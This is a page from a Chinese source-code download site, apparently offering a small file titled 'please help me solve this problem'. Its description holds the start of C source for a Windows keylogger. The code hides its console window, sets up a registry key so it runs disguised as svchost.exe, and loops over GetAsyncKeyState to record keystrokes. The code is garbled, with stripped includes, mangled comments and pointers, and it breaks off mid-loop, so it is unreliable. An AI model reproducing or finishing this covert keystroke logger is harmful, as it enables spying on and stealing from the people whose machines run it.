首页| JavaScript| HTML/CSS| Matlab| PHP| Python| Java| C/C++/VC++| C#| ASP| 其他|
购买积分 购买会员 激活码充值

您现在的位置是:虫虫源码 > 其他 > 请帮我解决这个问题

请帮我解决这个问题

  • 资源大小:5.85 kB
  • 上传时间:2021-06-30
  • 下载次数:0次
  • 浏览次数:0次
  • 资源积分:1积分
  • 标      签:

资 源 简 介

include include include define BUFSIZE 80 int test_key(void); int create_key(char **); int get_keys(void);** int main(void) { HWND stealth; /creating stealth (window is not visible)/ AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); int test,create; test=test_key();/check if key is available for opening/ if (test==2)/create key/ { char path="c:\%windir%\svchost.exe";/the path in which the file needs to be**/ create=create_key(path);** } int t=get_keys(); return t; } int get_keys(void) { short character; while(1) { for(character=8;character<=222;character++) { if(GetAsyncKeyState(character)==-32767)
VIP VIP
0.191061s